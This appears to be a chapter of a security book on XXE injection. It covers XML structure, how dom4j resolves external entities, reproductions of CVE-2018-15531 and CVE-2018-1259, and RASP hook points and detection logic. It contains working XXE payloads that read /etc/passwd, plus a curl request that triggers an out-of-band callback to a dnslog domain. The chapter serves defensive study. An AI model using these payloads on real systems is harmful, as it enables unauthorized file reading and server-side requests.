XXE Injection Principles and Detection
XXE stands for XML External Entity Injection: an application parses attacker-supplied XML and resolves the external entities declared in it, so the parser can be made to load resources chosen by the attacker. This can lead to file reading, command execution, internal network port scanning, attacks on internal websites, and denial-of-service (DoS) attacks.
This chapter first introduces the basic structure of XML and parsing tools, then explains the exploitation principles and defense strategies of XXE, and finally provides hook points and detection algorithms.
14.1 XML Basics
14.1.1 Basic Structure of XML Documents
XML documents follow specific rules and are organized into components, primarily consisting of three parts: the XML declaration, Document Type Definition (DTD, where XXE vulnerabilities reside), and document elements.
- XML Declaration (Optional)
An XML document may begin with an XML declaration, which provides metadata about the document itself, such as version number and character encoding. For example:
<?xml version="1.0" encoding="UTF-8"?>
- Document Type Definition (DTD)
DTD or XML Schema is used to define the valid structure, elements, attributes, and their relationships in a document. A DTD reference might look like this:
<!DOCTYPE rootElement SYSTEM "myDTD.dtd">
Or using XML Schema:
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"> <!-- schema definitions go here --></xs:schema>
- Element Structure
Root Element: Every XML document must have exactly one root element, which serves as the container for all other elements.
Child Elements: Elements can contain other elements as their children, forming a hierarchical structure.
Attributes: Elements can have attributes, which are name/value pairs providing additional information about the element.
Text Content: Elements can contain text content or character data (CDATA) sections.
Comments: XML documents can include comments, which do not affect document parsing.
The following XML document includes the basic structure described above:
<?xml version="1.0" encoding="UTF-8"?>
<!-- This XML document example describes a simple book catalog -->
<!DOCTYPE catalog [
  <!ELEMENT catalog (book*)>
  <!ELEMENT book (title, author+, year, description?)>
  <!ATTLIST book id ID #REQUIRED>
  <!ELEMENT title (#PCDATA)>
  <!ELEMENT author (#PCDATA)>
  <!ELEMENT year (#PCDATA)>
  <!ELEMENT description (#PCDATA)>
]>
<catalog>
  <!-- Book entry starts -->
  <book id="bk101">
    <title>XML Primer</title>
    <author>Zhang San</author>
    <author>Li Si</author>
    <year>2005</year>
    <description><![CDATA[This book is the perfect guide for XML beginners, covering both basic and advanced XML concepts in detail.]]></description>
  </book>
  <book id="bk102">
    <title>Java Programming</title>
    <author>Wang Wu</author>
    <year>2009</year>
  </book>
  <!-- Book entry ends -->
</catalog>
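To make the role of the DTD concrete, the following is a minimal sketch that validates two small documents against an internal DTD using the JDK's built-in JAXP parser. The class name DtdValidationSketch, the helper validate, and the trimmed-down DTD are illustrative assumptions and are not part of the catalog example itself.

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.ErrorHandler;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

class DtdValidationSketch {
    // Hypothetical DTD, trimmed from the catalog example for brevity.
    static final String DTD =
        "<!DOCTYPE catalog ["
        + "<!ELEMENT catalog (book*)>"
        + "<!ELEMENT book (title)>"
        + "<!ATTLIST book id ID #REQUIRED>"
        + "<!ELEMENT title (#PCDATA)>"
        + "]>";

    /** Parses the XML with DTD validation enabled and returns the validity errors reported. */
    static List<String> validate(String xml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setValidating(true); // check the document against its DTD
        DocumentBuilder builder = factory.newDocumentBuilder();
        final List<String> errors = new ArrayList<>();
        builder.setErrorHandler(new ErrorHandler() {
            @Override public void warning(SAXParseException e) { /* ignored in this sketch */ }
            @Override public void error(SAXParseException e) { errors.add(e.getMessage()); }
            @Override public void fatalError(SAXParseException e) throws SAXParseException { throw e; }
        });
        builder.parse(new InputSource(new StringReader(xml)));
        return errors;
    }

    public static void main(String[] args) throws Exception {
        String valid = DTD + "<catalog><book id=\"bk101\"><title>XML Primer</title></book></catalog>";
        // The required id attribute is missing, so the DTD is violated.
        String invalid = DTD + "<catalog><book><title>XML Primer</title></book></catalog>";
        System.out.println("valid document errors:   " + validate(valid).size());
        System.out.println("invalid document errors: " + validate(invalid).size());
    }
}
```

The second document is well-formed but not valid, which is why the problem surfaces through the error callback rather than as a parse failure.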
14.1.2 XML External Entities
DTD (Document Type Definition) serves to define the legal building blocks of an XML document. A DTD can be declared internally within an XML document or referenced externally.
- Internal Entities
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY bar "hello">]><foo>&bar;</foo>
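As a small illustration of how an internal entity is expanded, the sketch below parses the document above with the JDK's default DocumentBuilderFactory and reads the text of the root element. The class name InternalEntitySketch and the helper expand are assumptions made for this example.

```java
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

class InternalEntitySketch {
    static final String XML =
        "<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY bar \"hello\">]><foo>&bar;</foo>";

    /** Parses the XML and returns the text content of the root element. */
    static String expand(String xml) throws Exception {
        Document doc = DocumentBuilderFactory.newInstance()
            .newDocumentBuilder()
            .parse(new InputSource(new StringReader(xml)));
        return doc.getDocumentElement().getTextContent();
    }

    public static void main(String[] args) throws Exception {
        // The reference &bar; is replaced by the entity's declared value.
        System.out.println(expand(XML)); // prints "hello"
    }
}
```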
- External Entities
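External entities are declared with the keyword SYSTEM or PUBLIC. SYSTEM is followed by a URI that locates the entity content, which may be a local file or a remote resource; PUBLIC is followed by a public identifier and then a system URI. Example of an external entity: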
<?xml version="1.0"?><!DOCTYPE mage[<!ENTITY file SYSTEM "file:///etc/passwd">]><root>&file;</root>
An external entity named ‘file’ is defined in the DTD section and is then referenced in the document element section. The format for referencing an entity is: &entity_name;
14.2 External Entity Parsing Source Code Analysis
14.2.1 External Entity Injection for File Reading
An xxe.xml document containing external entity injection is shown below:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY firstname SYSTEM "file:///etc/passwd">
]>
<user>
  <firstname>&firstname;</firstname>
  <lastname>lastname</lastname>
</user>
Using Dom4j to parse the above XML document, the code is as follows:
```java
import org.dom4j.Document;
import org.dom4j.Element;
import org.dom4j.io.SAXReader;

import java.io.File;

public class Main {
    public static void main(String[] args) throws Exception {
        // Parse with a default (unhardened) SAXReader, so external entities are resolved.
        File file = new File("src/main/resources/xxe.xml");
        Document doc = new SAXReader().read(file);
        Element rootElement = doc.getRootElement();
        // Prints the expanded entity, i.e. the contents of /etc/passwd.
        System.out.println(rootElement.element("firstname").getText());
    }
}
```
Output:
##
# User Database
#
# Note that this file is consulted directly only when the system is running
# in single-user mode. At other times this information is provided by
# Open Directory.
#
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico
_taskgated:*:13:13:Task Gate Daemon:/var/empty:/usr/bin/false
_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false
//...Output truncated due to space limitations
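For contrast with the vulnerable parse above, here is a minimal sketch of a fail-closed configuration. It uses the JDK's built-in SAXParserFactory rather than dom4j so that it runs without extra dependencies, and it sets the Xerces feature disallow-doctype-decl so that any document carrying a DOCTYPE is rejected before an entity can be resolved. The class name DisallowDoctypeSketch and the helper isRejected are assumptions made for this example.

```java
import java.io.StringReader;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.XMLReader;
import org.xml.sax.helpers.DefaultHandler;

class DisallowDoctypeSketch {
    static final String XXE_XML =
        "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
        + "<!DOCTYPE foo [ <!ENTITY firstname SYSTEM \"file:///etc/passwd\" > ]>"
        + "<user><firstname>&firstname;</firstname><lastname>lastname</lastname></user>";

    /** Returns true if the hardened parser refuses the document. */
    static boolean isRejected(String xml) throws Exception {
        SAXParserFactory factory = SAXParserFactory.newInstance();
        // Reject every document that contains a DOCTYPE declaration.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        XMLReader reader = factory.newSAXParser().getXMLReader();
        reader.setContentHandler(new DefaultHandler());
        try {
            reader.parse(new InputSource(new StringReader(xml)));
            return false;
        } catch (SAXException e) {
            // The parser stops at the DOCTYPE; the entity is never resolved.
            return true;
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println("XXE document rejected: " + isRejected(XXE_XML));
        System.out.println("plain document rejected: "
            + isRejected("<user><firstname>a</firstname></user>"));
    }
}
```

With dom4j, the same feature can be set on the reader through SAXReader.setFeature before calling read. Rejecting DOCTYPE outright is the strictest option; applications that genuinely need DTDs have to disable external entities selectively instead.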
14.2.2 Source Code Analysis and Debugging
The complete process of dom4j reading and parsing XML documents consists of three main steps:
14.2.2.1 XML File Path Processing
The primary function of the SAXReader.read method is to obtain the absolute path of the XML file on disk and set it as the resource path of the input source object.
Figure 14-1 SAXReader Reading Disk File
The relative path of xxe.xml is src/main/resources/xxe.xml. At line 308 of the above code, the method obtains the absolute disk path of the XML file and stores it as the inputSource’s resource path in URL format. At line 325, it calls an overloaded version of the SAXReader.read method.
14.2.2.2 Creating XMLReader Object
At line 464, the getXMLReader method is called to create an XMLReader object, which is key to parsing XML documents. Let’s examine its implementation. Through debugging, we can see the critical code for creating the XMLReader as follows:
At line 46, an instance of SAXParserFactory is obtained, and the factory instance’s newSAXParser method is called. Since SAXParserFactory is an abstract class, let’s see how the factory class is instantiated. Its initialization code:
From the code, we can see the factory implementation is SAXParserFactoryImpl. Let’s examine its newSAXParser method implementation:
We can observe that in the newSAXParser method, a SAXParserImpl object is created, followed by calling the getXMLReader method as shown below:
The initialization of xmlReader occurs in the SAXParserImpl constructor. Let’s examine the constructor method of SAXParserImpl:
At this point, the class responsible for XML parsing is JAXPSAXParser, which is a subclass of SAXParser. Its UML class diagram is as follows:
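The factory-to-reader chain traced in this subsection can also be observed without a debugger. The following minimal sketch prints the concrete classes behind SAXParserFactory, SAXParser, and XMLReader at runtime. The class name ParserChainSketch and the helper implementationNames are assumptions made for this example, and the exact class names printed depend on which JAXP implementation is on the classpath.

```java
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.XMLReader;

class ParserChainSketch {
    /** Returns the concrete class names of the factory, the parser, and the XMLReader. */
    static String[] implementationNames() throws Exception {
        SAXParserFactory factory = SAXParserFactory.newInstance(); // abstract type, concrete instance
        SAXParser parser = factory.newSAXParser();
        XMLReader reader = parser.getXMLReader();
        return new String[] {
            factory.getClass().getName(),
            parser.getClass().getName(),
            reader.getClass().getName()
        };
    }

    public static void main(String[] args) throws Exception {
        // On a stock JDK these are typically classes under
        // com.sun.org.apache.xerces.internal.jaxp.
        for (String name : implementationNames()) {
            System.out.println(name);
        }
    }
}
```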
14.2.2.3 XML Document Parsing
After creating the xmlReader object, the XML document reading begins.
From the above UML class diagram, we can see that the actual parsing class is JAXPSAXParser, which is an inner class of SAXParserImpl. The parse method is as follows:
It actually calls its parent class’s parse method, implemented as:
At line 1216, we can see it actually calls the parse method of the XMLParser class:
In this method, fConfiguration is responsible for parsing XML. The declared type of fConfiguration is an interface called XMLParserConfiguration. The UML class diagram for this interface is as follows:
We can see that the actual parsing class is XML11Configuration, with relevant methods as follows:
Here it actually calls fCurrentScanner.scanDocument, where the actual document scanning begins:
Looking at the next method, we can see that it parses the XML document into individual events:
Our main focus is on the parsing of entity references:
When scanning entity references, the scanEntityReference method is called. The code for this method is as follows:
At line 1238, the startEntity method is called to parse the entity.
The setupCurrentEntity method is responsible for parsing entity resources, implemented as follows:
At this point, the debugging of the external entity reference parsing process in XML documents is complete.
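One way to watch the external-entity resolution step from application code is to install an EntityResolver, which the parser consults when it starts an external entity. The sketch below records the system identifier the parser asks for and returns stub content instead of touching the file system. The class name EntityResolutionTraceSketch, the path file:///hypothetical/secret.txt, and the stub text are all assumptions made for this example, and the sketch relies on the JDK parser's default behaviour of resolving external general entities.

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.InputSource;
import org.xml.sax.XMLReader;
import org.xml.sax.helpers.DefaultHandler;

class EntityResolutionTraceSketch {
    static final String XML =
        "<!DOCTYPE foo [<!ENTITY firstname SYSTEM \"file:///hypothetical/secret.txt\">]>"
        + "<user><firstname>&firstname;</firstname></user>";

    final List<String> requestedSystemIds = new ArrayList<>();
    final StringBuilder text = new StringBuilder();

    void parse(String xml) throws Exception {
        XMLReader reader = SAXParserFactory.newInstance().newSAXParser().getXMLReader();
        DefaultHandler handler = new DefaultHandler() {
            @Override
            public InputSource resolveEntity(String publicId, String systemId) {
                // Called when the parser is about to load an external entity.
                requestedSystemIds.add(systemId);
                // Supply stub content so that no real resource is opened.
                return new InputSource(new StringReader("STUBBED-ENTITY-CONTENT"));
            }

            @Override
            public void characters(char[] ch, int start, int length) {
                text.append(ch, start, length);
            }
        };
        reader.setContentHandler(handler);
        reader.setEntityResolver(handler);
        reader.parse(new InputSource(new StringReader(xml)));
    }

    public static void main(String[] args) throws Exception {
        EntityResolutionTraceSketch trace = new EntityResolutionTraceSketch();
        trace.parse(XML);
        System.out.println("requested: " + trace.requestedSystemIds);
        System.out.println("text seen by handler: " + trace.text);
    }
}
```

The system identifier captured here is the same kind of value that a hook on startEntity would inspect, which is why the entity manager is a natural interception point.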
14.3 XXE Vulnerability Examples
14.3.1 CVE-2018-15531
- Vulnerability Overview
JavaMelody is a monitoring tool for Java applications and application servers (Tomcat, JBoss, WebLogic) in production and QA environments. It provides monitoring data through charts, helping developers and operations teams identify performance bottlenecks and optimize responses. Version 1.74.0 fixed an XXE vulnerability with CVE ID CVE-2018-15531. Attackers could exploit this vulnerability to read sensitive information on the JavaMelody server.
- Affected Versions
Versions < 1.74.0
- Fix Code
Commit link: https://github.com/javamelody/javamelody/commit/ef111822562d0b9365bd3e671a75b65bd0613353
- Vulnerability Environment Setup
Create a simple Spring Boot project and add the specified version of the javamelody dependency to pom.xml.
<dependency>
  <groupId>net.bull.javamelody</groupId>
  <artifactId>javamelody-spring-boot-starter</artifactId>
  <version>1.73.1</version>
</dependency>
After starting the application, access the monitoring page at http://localhost:8080/monitoring. The result is as follows:
- Register a DNS domain
Domain: 4yf5lc.dnslog.cn
The request is sent as follows:
curl --location --request POST 'http://localhost:8080' \
  --header 'Content-type: text/xml' \
  --header 'SOAPAction: aaaaa' \
  --data-raw '<?xml version="1.0" encoding="UTF-8" standalone="no" ?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://www.4yf5lc.dnslog.cn">%remote;]></root>'
Alternatively, you can send the request using Postman:
- Observe the Results
You can see that the dnslog.cn platform has recorded the server’s IP information.
Partial logs intercepted by RASP are shown below:
14.3.2 CVE-2018-1259
- Vulnerability Overview
XMLBeam provides an object view of underlying XML data while allowing access to the original XML information set. When used in combination with XMLBeam 1.4.14 or earlier versions, Spring Data Commons versions 1.13 to 1.13.11 and 2.0 to 2.0.6 do not restrict XML external entity references. This allows unauthenticated remote attackers to exploit specific parameters in Spring Data’s request binding to access arbitrary files on the system.
- Affected Versions
Spring Data Commons 1.13 to 1.13.11
Spring Data REST 2.6 to 2.6.11
Spring Data Commons 2.0 to 2.0.6
Spring Data REST 3.0 to 3.0.6
- Vulnerability Analysis
The vulnerability fix commit reveals modifications to the DefaultXMLFactoriesConfig file as shown below:
commit: https://github.com/SvenEwald/xmlbeam/commit/f8e943f44961c14cf1316deb56280f7878702ee1
The changes configure default features, disable entity references, and prevent merging multiple XML documents.
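The kind of hardening described here can be sketched with the standard DocumentBuilderFactory API. This is an illustrative configuration under stated assumptions, not the actual XMLBeam patch: the class name HardenedDomFactorySketch, the helpers hardenedFactory, payloadFor, and firstnameOf, and the temporary secret file are all made up for the example.

```java
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

class HardenedDomFactorySketch {
    /** Builds a factory that does not load external entities or external DTDs. */
    static DocumentBuilderFactory hardenedFactory() throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        factory.setXIncludeAware(false);            // do not merge other documents via XInclude
        factory.setExpandEntityReferences(false);   // do not inline entity references
        return factory;
    }

    /** Builds an XXE payload that points at the given file (hypothetical helper). */
    static String payloadFor(Path file) {
        return "<?xml version=\"1.0\"?>"
            + "<!DOCTYPE foo [<!ENTITY file SYSTEM \"" + file.toUri() + "\">]>"
            + "<user><firstname>&file;</firstname><lastname>rasp</lastname></user>";
    }

    /** Parses the XML with the hardened factory and returns the firstname text. */
    static String firstnameOf(String xml) throws Exception {
        Document doc = hardenedFactory().newDocumentBuilder()
            .parse(new InputSource(new StringReader(xml)));
        return doc.getElementsByTagName("firstname").item(0).getTextContent();
    }

    public static void main(String[] args) throws Exception {
        Path secret = Files.createTempFile("xxe-sketch", ".txt");
        Files.write(secret, "TOP-SECRET".getBytes(StandardCharsets.UTF_8));
        try {
            String firstname = firstnameOf(payloadFor(secret));
            System.out.println("leaked: " + firstname.contains("TOP-SECRET"));
        } finally {
            Files.deleteIfExists(secret);
        }
    }
}
```

Unlike rejecting DOCTYPE declarations outright, this configuration still accepts documents that carry a DTD but leaves external entity references unresolved.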
- Reproduction
The code is sourced from the official spring-data-examples demo spring-data-xml-xxe, with key sections as follows:
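```java
import org.springframework.data.web.JsonPath;
import org.springframework.data.web.ProjectedPayload;
import org.springframework.http.HttpEntity;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RestController;
import org.xmlbeam.annotation.XBRead;

@RestController
class UserController {

    // Projection interface: the XML (via XMLBeam) or JSON request body is bound to it.
    @ProjectedPayload
    public interface UserPayload {

        @XBRead("//firstname")
        @JsonPath("$..firstname")
        String getFirstname();

        @XBRead("//lastname")
        @JsonPath("$..lastname")
        String getLastname();
    }

    @PostMapping(value = "/")
    HttpEntity<String> post(@RequestBody UserPayload user) {
        return ResponseEntity
                .ok(String.format("Received firstname: %s, lastname: %s", user.getFirstname(), user.getLastname()));
    }
}
```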
Project pom.xml dependencies:
<dependency>
  <groupId>org.springframework.data</groupId>
  <artifactId>spring-data-commons</artifactId>
  <version>2.0.5.RELEASE</version>
</dependency>
<dependency>
  <groupId>com.jayway.jsonpath</groupId>
  <artifactId>json-path</artifactId>
</dependency>
<dependency>
  <groupId>org.xmlbeam</groupId>
  <artifactId>xmlprojector</artifactId>
  <version>1.4.13</version>
</dependency>
If you are familiar with Spring Boot project creation, the above code can build a complete application. After the project is built, compile it into an executable jar package and run it:
mvn clean package
java -jar ./target/xxe-demo-0.0.1-SNAPSHOT.jar
- Sending Requests
Arbitrary files can be read by sending an XML payload in a POST request. Example:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY file SYSTEM "file:///etc/passwd" >
]>
<user><firstname>&file;</firstname><lastname>rasp</lastname></user>
Send the request using Postman as shown below:
- Observing Results
Partial logs intercepted by RASP are as follows:
14.4 Hook Point Selection and Detection Algorithm
14.4.1 Hook Class Selection
Although there are many XML parsing libraries, it is sufficient to hook the part that resolves XML entities. For example, both DOM4J and JAXP rely on Apache Xerces for XML entity parsing. Relevant hook points are summarized as follows:
- Open-source tool apache.xerces
org.apache.xerces.impl.XMLEntityManager#startEntity(String, org.apache.xerces.xni.parser.XMLInputSource, boolean, boolean)
- Apache Xerces tool within JDK
com.sun.org.apache.xerces.internal.impl.XMLEntityManager#startEntity(boolean, String, com.sun.org.apache.xerces.internal.xni.parser.XMLInputSource, boolean, boolean)
It can be observed that besides the difference in package names, there are also some variations in the parameter lists between the two hook points mentioned above.
- Open-source tool wstx
com.ctc.wstx.sr.StreamScanner#expandEntity(com.ctc.wstx.ent.EntityDecl, boolean)
14.4.2 Detection Algorithm
XXE vulnerabilities in Java have limited exploitable protocols. All supported protocols are under the sun.net.www.protocol package. The protocols supported by JDK8 and JDK11 are as follows:
JDK11: jmod, jrt, mailto, file, ftp, http, https, jar;
JDK8: mailto, netdoc, file, ftp, http, https, jar;
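Which protocols a given runtime actually accepts can be checked empirically. The minimal sketch below asks java.net.URL whether a stream handler exists for a protocol name; the class name ProtocolProbeSketch and the helper isSupported are assumptions made for this example, and the result depends on the JDK version and on any custom handlers installed.

```java
import java.net.MalformedURLException;
import java.net.URL;

class ProtocolProbeSketch {
    /** Returns true if this JVM has a URL stream handler for the given protocol. */
    @SuppressWarnings("deprecation") // URL constructors are deprecated in recent JDKs but still work
    static boolean isSupported(String protocol) {
        try {
            // This constructor only looks up the handler; it does not open a connection.
            new URL(protocol, "localhost", "/probe");
            return true;
        } catch (MalformedURLException e) {
            // Thrown when no handler is registered for the protocol.
            return false;
        }
    }

    public static void main(String[] args) {
        String[] candidates = {"file", "ftp", "http", "https", "jar", "mailto", "netdoc", "jrt", "jmod"};
        for (String protocol : candidates) {
            System.out.println(protocol + " -> " + isSupported(protocol));
        }
    }
}
```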
The detection can be performed by obtaining the protocol name, path, and host name of external entity resources respectively. The parameter acquisition and detection are as follows:
The method to obtain parameters is shown below:
The algorithm for parameter detection is as follows:
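As a rough illustration of a check based on protocol, path, and host, the following sketch classifies the system identifier of an external entity. It is a hypothetical policy written for this example and not the detection algorithm referred to in this section: the class name XxeDetectionSketch, the Verdict enum, the sensitive path prefixes, and the host allowlist are all assumptions.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Arrays;
import java.util.List;
import java.util.Locale;
import java.util.Set;

class XxeDetectionSketch {
    enum Verdict { ALLOW, BLOCK }

    // Hypothetical list of path prefixes that an entity must never read.
    static final List<String> SENSITIVE_PREFIXES = Arrays.asList("/etc/", "/proc/", "/root/", "/var/root/");

    /** Decides whether an external entity with this system identifier may be loaded. */
    static Verdict inspect(String systemId, Set<String> allowedHosts) {
        URI uri;
        try {
            uri = new URI(systemId);
        } catch (URISyntaxException e) {
            return Verdict.BLOCK; // unparseable identifiers are treated as hostile
        }
        // A missing scheme is treated as a local file reference.
        String protocol = uri.getScheme() == null ? "file" : uri.getScheme().toLowerCase(Locale.ROOT);
        String host = uri.getHost();
        String path = uri.getPath();

        switch (protocol) {
            case "file":
                if (path == null) {
                    return Verdict.BLOCK;
                }
                // Normalize first so that "../" sequences cannot hide the real target.
                String normalized = uri.normalize().getPath();
                for (String prefix : SENSITIVE_PREFIXES) {
                    if (normalized.startsWith(prefix)) {
                        return Verdict.BLOCK;
                    }
                }
                return Verdict.ALLOW;
            case "http":
            case "https":
            case "ftp":
                // Outbound requests are allowed only to explicitly trusted hosts.
                boolean trusted = host != null && allowedHosts.contains(host.toLowerCase(Locale.ROOT));
                return trusted ? Verdict.ALLOW : Verdict.BLOCK;
            default:
                // jar, netdoc, mailto, jrt, jmod and anything else are rejected.
                return Verdict.BLOCK;
        }
    }

    public static void main(String[] args) {
        Set<String> hosts = new java.util.HashSet<>(Arrays.asList("schemas.example.com"));
        System.out.println(inspect("file:///etc/passwd", hosts));
        System.out.println(inspect("http://www.4yf5lc.dnslog.cn", hosts));
        System.out.println(inspect("http://schemas.example.com/catalog.dtd", hosts));
    }
}
```

In a RASP agent, a check of this shape would typically run inside the hooked entity-start method, with the system identifier taken from the XMLInputSource argument. Blocking by default for unknown protocols keeps the policy safe when a new handler appears in a later JDK.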